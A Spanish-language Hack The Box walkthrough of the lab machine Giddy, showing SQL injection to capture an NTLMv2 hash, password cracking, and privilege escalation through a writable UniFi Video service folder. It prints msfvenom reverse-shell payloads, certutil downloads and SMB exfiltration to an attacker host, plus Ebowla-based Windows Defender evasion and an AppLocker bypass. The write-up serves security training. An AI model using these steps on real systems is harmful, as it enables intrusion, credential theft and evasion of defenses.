• En este post vamos a resolver la maquina Giddy de la plataforma de Hack The Box donde aprovechándonos de una SQL Injection vamos a robar el hash NTLMv2 de un usuario y nos podremos conectarnos con evil-winrm ala maquina para la escalada de privilegios vamos abusar de un servicio que al correrlo podemos arrancar un .exe para hacer lo que queramos pero tendremos que hacer varios bypass al Windows Defender para conseguirlo.

PortScan

  • Comenzamos escaneando los puertos abiertos y servicios por el protocolo TCP de la maquina victima.
➜  nmap sudo nmap -sCV -p80,443,3389,5985 10.129.96.140 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 12:49 CST
Nmap scan report for 10.129.96.140
Host is up (0.085s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn:
|   h2
|_  http/1.1
| http-methods:
|_  Potentially risky methods: TRACE
|_ssl-date: 2024-04-26T18:49:52+00:00; -7s from scanner time.
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2024-04-26T18:49:46+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-04-25T18:44:55
|_Not valid after:  2024-10-25T18:44:55
|_ssl-date: 2024-04-26T18:49:53+00:00; -6s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -6s, deviation: 0s, median: -6s

Enumeración

  • Nos estamos enfrentando a un Windows 10.
➜  nmap cme rdp 10.129.96.140
RDP         10.129.96.140   3389   GIDDY            [*] Windows 10 or Windows Server 2016 Build 14393 (name:GIDDY) (domain:Giddy) (nla:True)
  • Estas son las tecnologías que corre por detrás la pagina web.
  nmap whatweb http://10.129.96.140
http://10.129.96.140 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.96.140], Microsoft-IIS[10.0], Title[IIS Windows Server], X-Powered-By[ASP.NET]
  • Esta es la pagina web.

  • Si damos click en la imagen nos lleva aquí.

  • La razón es por que en el código fuente hay una etiqueta la cual al dar click en la imagen nos redirige a esa ruta.

  • Vamos a hacer Fuzzing para ver si encontramos rutas interesantes.
➜  nmap gobuster dir -u http://10.129.96.140 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.96.140
[+] Method:                  GET
[+] Threads:                 80
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/remote               (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fremote]
/*checkout*           (Status: 400) [Size: 3420]
/*docroot*            (Status: 400) [Size: 3420]
/*                    (Status: 400) [Size: 3420]
/mvc                  (Status: 301) [Size: 148] [--> http://10.129.96.140/mvc/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 3420]
/http%3A              (Status: 400) [Size: 3420]
/q%26a                (Status: 400) [Size: 3420]
/**http%3a            (Status: 400) [Size: 3420]
/*http%3A             (Status: 400) [Size: 3420]
/**http%3A            (Status: 400) [Size: 3420]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 3420]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 3420]
/http%3A%2F%2Fblog    (Status: 400) [Size: 3420]
/Remote               (Status: 302) [Size: 157] [--> /Remote/default.aspx?ReturnUrl=%2fRemote]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 3420]
/s%26p                (Status: 400) [Size: 3420]
/%3FRID%3D2671        (Status: 400) [Size: 3420]
/devinmoore*          (Status: 400) [Size: 3420]
/200109*              (Status: 400) [Size: 3420]
/*sa_                 (Status: 400) [Size: 3420]
/*dc_                 (Status: 400) [Size: 3420]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 3420]
/Chamillionaire%20%26%20Paul%20Wall-%20Get%20Ya%20Mind%20Correct (Status: 400) [Size: 3420]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 400) [Size: 3420]
/DJ%20Haze%20%26%20The%20Game%20-%20New%20Blood%20Series%20Pt (Status: 400) [Size: 3420]
/http%3A%2F%2Fradar   (Status: 400) [Size: 3420]
/q%26a2               (Status: 400) [Size: 3420]
/login%3f             (Status: 400) [Size: 3420]
/Shakira%20Oral%20Fixation%201%20%26%202 (Status: 400) [Size: 3420]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 3420]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 3420]
/http%3A%2F%2Fswik    (Status: 400) [Size: 3420]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
  • Bueno si nos vamos a la parte de Remote encontramos esto pero no tenemos credenciales.

  • Si vamos ala ruta mvc nada interesante.

SQL Injection

  • Si selecciono un producto la URL ya es interesante.

  • Si pongo una ' después de id=28 nos devuelve un error además de que vemos un usuario jnogueira.

  • Estamos ante una maquina Windows a si que lo que podemos hacer es jugar con el xp_dirtree sabiendo que corre mysql por detrás https://stackoverflow.com/questions/26750054/xp-dirtree-in-sql-server.

  • Si vemos el recurso vemos que comparten una query que al parecer se esta usando para robar el hash NTLMv2 de algún usuario ya que se conecta algún recurso compartido podemos nosotros compartir uno para intentarlo.

➜  Downloads impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
  • Pero nada.

  • Si revisamos el error nos dice Incorrect syntar near ' así que vamos a probar quitándole la '.

  • Y funciona nos llega el hash del usuario Stacy.
➜  Downloads impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.96.140,49709)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:fd090e689929af2ccc006414acc9091c:01010000000000000050ab281298da0166fd32f6cb3311030000000001001000650050005200740050004500440068000300100065005000520074005000450044006800020010006f006a0065006f004700740061004100040010006f006a0065006f004700740061004100070008000050ab281298da0106000400020000000800300030000000000000000000000000300000670f571a29eefa618339fbbf9271e7c33d87cc2100fa14d9046c67efb0dcd8ce0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00320031003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:2d920fc42f14ee67db3416f7bfb13486:010100000000000080e643291298da01927a3a66ded6d3fe0000000001001000650050005200740050004500440068000300100065005000520074005000450044006800020010006f006a0065006f004700740061004100040010006f006a0065006f0047007400610041000700080080e643291298da0106000400020000000800300030000000000000000000000000300000670f571a29eefa618339fbbf9271e7c33d87cc2100fa14d9046c67efb0dcd8ce0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00320031003600000000000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:smbFolder)
[*] Closing down connection (10.129.96.140,49709)
[*] Remaining connections []

Stacy

  • Vamos a crackear el hash.
➜  content john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x     (Stacy)
1g 0:00:00:16 DONE (2024-04-26 13:47) 0.05899g/s 158644p/s 158644c/s 158644C/s xabat..x9831915x
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
  • El usuario Stacy forma parte del grupo Remote Management Users.
➜  content cme winrm 10.129.96.140 -u 'stacy' -p 'xNnWo6272k7x'
SMB         10.129.96.140   5985   NONE             [*] None (name:10.129.96.140) (domain:None)
HTTP        10.129.96.140   5985   NONE             [*] http://10.129.96.140:5985/wsman
WINRM       10.129.96.140   5985   NONE             [+] None\stacy:xNnWo6272k7x (Pwn3d!)
  • Ahora ya podemos conectarnos.
➜  content evil-winrm -i 10.129.96.140 -u 'stacy' -p 'xNnWo6272k7x'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami
giddy\stacy
*Evil-WinRM* PS C:\Users\Stacy\Documents>
  • Vemos la primera flag.
*Evil-WinRM* PS C:\Users\Stacy\Documents> type C:\Users\Stacy\Desktop\user.txt
e7d6583b3852e4219ee8c8e1b83aa588

Escalada de Privilegios

  • Si recordamos tenemos Un Windows PowerShell Web Access así que podemos conectarnos por allí también.

  • Pero básicamente es lo mismo.

  • Encontramos un archivo interesante.
*Evil-WinRM* PS C:\Users\Stacy\Documents> dir


    Directory: C:\Users\Stacy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2018   9:36 AM              6 unifivideo

  • Tiene vulnerabilidades.
➜  content searchsploit unifi video
-------------------------------------- ---------------------------------
 Exploit Title                        |  Path
-------------------------------------- ---------------------------------
Ubiquiti Networks UniFi Video Default | php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Pr | windows/local/43390.txt
-------------------------------------- ---------------------------------
Shellcodes: No Results
  • Si examinamos el windows/local/43490.txt nos dice donde esta instalado.
5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-v
ideo\"
by default and is also shipped with a service called "Ubiquiti UniFi Vid
eo". Its
executable "avService.exe" is placed in the same directory and also runs
 under
the NT AUTHORITY/SYSTEM account.
*Evil-WinRM* PS C:\ProgramData\unifi-video> dir


    Directory: C:\ProgramData\unifi-video


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2018   9:54 PM                bin
d-----        6/16/2018   9:55 PM                conf
d-----        6/16/2018  10:56 PM                data
d-----        6/16/2018   9:54 PM                email
d-----        6/16/2018   9:54 PM                fw
d-----        6/16/2018   9:54 PM                lib
d-----        4/26/2024   2:48 PM                logs
d-----        6/16/2018   9:55 PM                webapps
d-----        6/16/2018   9:55 PM                work
-a----        7/26/2017   6:10 PM         219136 avService.exe
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log
-a----        8/16/2018   7:48 PM         270597 hs_err_pid2036.mdmp
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe
  • Además nos dicen que tenemos capacidad de escritura.
However the default permissions on the "C:\ProgramData\unifi-video" fold
er are
inherited from "C:\ProgramData" and are not explicitly overridden, which
 allows
all users, even unprivileged ones, to append and write files to the appl
ication
directory:

c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
  • Y si es correcto.
*Evil-WinRM* PS C:\ProgramData\unifi-video> echo prueba > prueba
*Evil-WinRM* PS C:\ProgramData\unifi-video> dir


    Directory: C:\ProgramData\unifi-video


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2018   9:54 PM                bin
d-----        6/16/2018   9:55 PM                conf
d-----        6/16/2018  10:56 PM                data
d-----        6/16/2018   9:54 PM                email
d-----        6/16/2018   9:54 PM                fw
d-----        6/16/2018   9:54 PM                lib
d-----        4/26/2024   2:48 PM                logs
d-----        6/16/2018   9:55 PM                webapps
d-----        6/16/2018   9:55 PM                work
-a----        7/26/2017   6:10 PM         219136 avService.exe
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log
-a----        8/16/2018   7:48 PM         270597 hs_err_pid2036.mdmp
-a----        4/26/2024   4:11 PM             18 prueba
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe
  • Nos dicen que cuando arrancas el servicio arranque un .exe que no existe en el directorio por defecto.
Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.
  • Lo que debemos hacer es crear ese .exe.

  • Para crear binarios podemos usar msfvenom.

➜  content msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.216 LPORT=443 -f exe -o taskkill.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: taskkill.exe
  • Ahora lo vamos a subir ala maquina victima.
➜  content python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
*Evil-WinRM* PS C:\ProgramData\unifi-video> certutil.exe -f -urlcache -split http://10.10.14.216:8080/taskkill.exe taskkill.exe
****  Online  ****
  0000  ...
  1c00
CertUtil: -URLCache command completed successfully.
  • Si nos ponemos en escucha y lo ejecutamos para ver si nos llega una reverse shell vemos el siguiente error.
*Evil-WinRM* PS C:\ProgramData\unifi-video> .\taskkill.exe
The term '.\taskkill.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (.\taskkill.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
  • Si lo hacemos rápido vemos que el Windows Defender lo detecta como virus.
*Evil-WinRM* PS C:\ProgramData\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
  • Vamos hacer un Bypass.

  • Vamos a usar mingw-w64 https://learn.microsoft.com/es-es/vcpkg/users/platforms/mingw para en vez de subir el .exe ala maquina vamos a crear un archivo C para compilar y así ya no lo detecte el defender.

  • Lo que podemos decirle es que nos mande la flag de root a un recurso de nosotros.

➜  content cat exc.c
#include <stdlib.h>

int main(){
	system("type C:\\Users\\Administrator\\Desktop\\root.txt > \\\\10.10.14.216\\smbFolder\\root.txt");
}
  • Ahora usamos la herramienta que instalamos.
➜  content x86_64-w64-mingw32-gcc exc.c -o taskkill.exe
  • Vamos a mandarlo a la maquina victima otra vez.
*Evil-WinRM* PS C:\ProgramData\unifi-video> certutil.exe -f -urlcache -split http://10.10.14.216:8080/taskkill.exe taskkill.exe
****  Online  ****
  000000  ...
  01c0d2
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\ProgramData\unifi-video> dir


    Directory: C:\ProgramData\unifi-video


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2018   9:54 PM                bin
d-----        6/16/2018   9:55 PM                conf
d-----        6/16/2018  10:56 PM                data
d-----        6/16/2018   9:54 PM                email
d-----        6/16/2018   9:54 PM                fw
d-----        6/16/2018   9:54 PM                lib
d-----        4/26/2024   2:48 PM                logs
d-----        6/16/2018   9:55 PM                webapps
d-----        6/16/2018   9:55 PM                work
-a----        7/26/2017   6:10 PM         219136 avService.exe
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log
-a----        8/16/2018   7:48 PM         270597 hs_err_pid2036.mdmp
-a----        4/26/2024   4:40 PM         114898 taskkill.exe
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe
  • Ahora iniciamos el impacket-smbserver por que en el script definimos que allí nos llegue la flag.
➜  content impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\ProgramData\unifi-video> cd HKLM:SYSTEM\CurrentControlSet\Services
  • Vemos el nombre.
*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services> dir | Select-String 'Unifi'

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UniFiVideoService


*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services
  • Ahora ya podemos parar el proceso.
*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services> Stop-Service -Name UniFiVideoService -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services>
  • Y nos llega.
➜  content impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.96.140,49729)
[*] AUTHENTICATE_MESSAGE (\,GIDDY)
[*] User GIDDY\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:smbFolder)
[*] Closing down connection (10.129.96.140,49729)
[*] Remaining connections []

root flag

  • Y vemos la flag.
➜  content cat root.txt
2873baf68c08b318321f3689ca29ad7a

Shell as root

  • Ahora vamos a ganar acceso pero con una consola.

  • Vamos a volver a generar el .exe con msfvenom.

➜  content msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.216 LPORT=443 -f exe -o taskkill.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: taskkill.exe
  • Vamos arrancar el servicio otra vez.
*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services> cmd /c sc start UniFiVideoService

SERVICE_NAME: UniFiVideoService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1148
        FLAGS              :
➜  content git clone https://github.com/Genetic-Malware/Ebowla
Cloning into 'Ebowla'...
remote: Enumerating objects: 559, done.
remote: Total 559 (delta 0), reused 0 (delta 0), pack-reused 559
Receiving objects: 100% (559/559), 35.46 MiB | 1.29 MiB/s, done.
Resolving deltas: 100% (287/287), done.
➜  content mv taskkill.exe Ebowla
➜  content cd Ebowla
➜  Ebowla git:(master)ls
Eko_2016_Morrow_Pitts_Master.pdf                  cleanup.py
Infiltrate_2016_Morrow_Pitts_Genetic_Malware.pdf  documentation.md
LICENSE.md                                        ebowla.py
MemoryModule                                      encryption
README.md                                         formats.md
build_python.sh                                   genetic.config
build_x64_go.sh                                   taskkill.exe
build_x86_go.sh                                   templates
  • Ahora vamos a editar el genetic.config.

  • Tiene que quedar de esta forma.

➜  Ebowla git:(master)cat genetic.config
[Overall]

    # Options ENV, OTP

    Encryption_Type = ENV


    # Template output: GO, Python, OR PowerShell

    output_type = GO


    # Number of bytes subtracted from the reconstructed payload that will be the
    # sha512 checksum used when checking the file before executing the payload.

    minus_bytes = 1


    # type of file being fed (payload) - also determines execution
    # Python: EXE, DLL_x86, DLL_x64 are written to disk
    # GO: Nothing is written to disk
    # OPTIONS for GO: EXE, DLL_x86, DLL_x64, SHELLCODE
    # OPTIONS for PYTHON: EXE, SHELLCODE, CODE, FILE_DROP
    # OPTIONS for PowerShell: CODE, DLL_x86, DLL_x64, EXE, FILE_DROP

    payload_type = EXE


    # key_iterations is for otp_type = key and for symmetric_settings_win
    # It is the number of times that the key hash is iterated via sha512 before being used
    # as the encryption key.  NOT available to otp_type = full

    key_iterations = 10000

    # Clean the resulting loaders from comments and print statements
    # This will make the runs faster and not display status information on the victim host
    # Most useful once payloads have been tested and are ready for deployment
    # Values Bool: True or False

    clean_output = False


[otp_settings]
    # otp is simple, provide one time pad, type,  and starting search location
    # type is full otp to reconstruct the malware in memory, or an offset in the file for a symmetric key

    otp_type = key # OPTIONS: full, key


    # File for use with otp

    pad = 'cmd.exe'

    # Max pad size: Decide the largest pad size to use.
    # 256 ** 3 - 1 (16777215 or 0xffffff) maximum is supported
    # Too small might be a bad idea...

    pad_max = 0xffffff

    # starting location in the path to start looking if walking the path

    scan_dir = 'c:\windows\sysnative'#'%APPDATA%'


    # For use with FULL OTP:
    #  Number of max bytes for matching the payload against the OTP
    #  -- larger byte width equals possible smaller lookup table but longer build times

    byte_width = 9



[symmetric_settings_win]
    # AES-CFB-256 key from a combination of the any of the following settings.
    # Any of the following can be used, the more specific to your target the better.


    # set the value to '' if you do not want to use that value


    # This is not a permanent list.  Any env variable can be added below.
    # If you want the env variable to be used, give it a value.
    # These are case insensitive.

    [[ENV_VAR]]

        username = ''
        computername = 'Giddy'
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = ''
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''


     [[PATH]]

    # Check if a path exists on the workstation
    # Only one path can be used.  This is immutable. To use, give it a value and a start location.

        # This is the path that will be used as part of the key

        path = ''

        # You can provide Env Variables that are associated with a path for the start_loc
        #  , such as %TEMP%, %APPDATA%, %PROGRAMFILES%
    # You Must use the %ENV VAR% when using env vars for paths!
    # Examples: C:\Windows, C:\Program Files, %APPDATA%

    start_loc = '%HOMEPATH%'


    [[IP_RANGES]]

    # Network mask for external enumeration 22.23.0.0
    # IP mask should not be used alone more simple to brute force.
    # Support for only 24 16 8 masks or exact ip
    # 12.12.0.0 or 12.12.12.12 or 12.12.0.0 or 12.0.0.0

    external_ip_mask = ''


    [[SYSTEM_TIME]]

    # Time Range with BEGING and END in EPOC
        # Should be used with another variable
    # This is a mask: 20161001 or 20161000 or 20160000
    # YEAR, MONTH, DAY

    Time_Range = ''
  • Ahora lo ejecutamos.
➜  Ebowla git:(master) ✗ python2 ebowla.py taskkill.exe genetic.config
[*] Using Symmetric encryption
[*] Payload length 7168
[*] Payload_type exe
[*] Using EXE payload template
[*] Used environment variables:
	[-] environment value used: computername, value used: giddy
[!] Path string not used as pasrt of key
[!] External IP mask NOT used as part of key
[!] System time mask NOT used as part of key
[*] String used to source the encryption key: giddy
[*] Applying 10000 sha512 hash iterations before encryption
[*] Encryption key: 91798b223b0690d70e3934063458f6bd14279758a6fe1bc78ff0c7fdb489be0c
[*] Writing GO payload to: go_symmetric_taskkill.exe.go
  • Y aquí no los guardo.
➜  Ebowla git:(master)ls -l output
total 20
-rw-r--r-- 1 miguel miguel 20223 Apr 26 15:34 go_symmetric_taskkill.exe.go
  • Ahora tenemos que compilarlo.
➜  Ebowla git:(master) ✗ ./build_x64_go.sh output/go_symmetric_taskkill.exe.go taskkill_ebowla.exe
[*] Copy Files to tmp for building
[*] Building...
[*] Building complete
[*] Copy taskkill_ebowla.exe to output
[*] Cleaning up
[*] Done
  • Allí tenemos el binario.
➜  output git:(master)ls
go_symmetric_taskkill.exe.go  taskkill_ebowla.exe
  • Después de cambiarle el nombre vamos a subirlo de nuevo ala maquina victima usando el servidor http con python3 que teníamos.
*Evil-WinRM* PS C:\ProgramData\unifi-video> erase taskkill.exe
*Evil-WinRM* PS C:\ProgramData\unifi-video> certutil.exe -f -urlcache -split http://10.10.14.216:80/taskkill.exe taskkill.exe
****  Online  ****
  000000  ...
  3dea72
CertUtil: -URLCache command completed successfully.
  • Ahora nos ponemos en escucha.
➜  content rlwrap nc -nlvp 443
listening on [any] 443 ...
  • Pero ahora nos da otro error.
*Evil-WinRM* PS C:\ProgramData\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: This program is blocked by group policy. For more information, contact your system administratorAt line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\ProgramData\unifi-video> copy taskkill.exe C:\Windows\System32\spool\drivers\color\taskkill.exe
  • Si lo ejecutamos nos llega la shell.
*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> .\taskkill.exe
[*] IV: 1150b91085ef56a08ef912c3eb577bf7
[*] Size of encrypted_payload:  9600
[*] Hash of encrypted_payload: 0b07402cefb4af5c5479a73d1ce4c9263622edf5ec70b53c750207e111d46d967727a660aeb7de5b29c8327585d76eb7c03182940081d2fff0d0d664319600a7
[*] Number of keys: 1
[*] Final key_list: [giddy]
==================================================
[*] Key: giddy
[*] Computed Full Key @ 2710 iterations: 91798b223b0690d70e3934063458f6bd14279758a6fe1bc78ff0c7fdb489be0c8a0e4c69b5ea1fba75d8bce580a3a7a51df239e28be0c36675dd065b1d4dd921
[*] AES Password 91798b223b0690d70e3934063458f6bd14279758a6fe1bc78ff0c7fdb489be0c
[*] Decoded Payload with Padding: 2e95bce3869bea6029ee864c4d9765424a36413a268f452c532259ee2faecc6708d839228cc51165614c0e8f8a1c0396b5695db2c1eba525c3d121cf9b4de819
[*] Message Length: 7168
[*] Message Length w/ Padding: 7168
[*] Test Hash : 1392fb2eafe3dfd6a8e0ff9159df555b5ec2f19ff617c78811ecf66834abdd9062b8dfc7d3696311ecaf53834c9bad4efbb02107a2fb0fd9378547686374fe32
Search Hash: 1392fb2eafe3dfd6a8e0ff9159df555b5ec2f19ff617c78811ecf66834abdd9062b8dfc7d3696311ecaf53834c9bad4efbb02107a2fb0fd9378547686374fe32
[*] Hashes Match
Len full_payload: 7168
[*] Key Combinations:  [[giddy]]
  • Con esto podemos ver que si funciona pero queremos estar como el administrador si recordamos necesitamos parar el servicio y arrancarlo.
*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service -Name UniFiVideoService -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
  • Y ahora ya estamos como nt authority\system.
➜  content rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.216] from (UNKNOWN) [10.129.96.140] 49774
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami
whoami
nt authority\system

C:\ProgramData\unifi-video>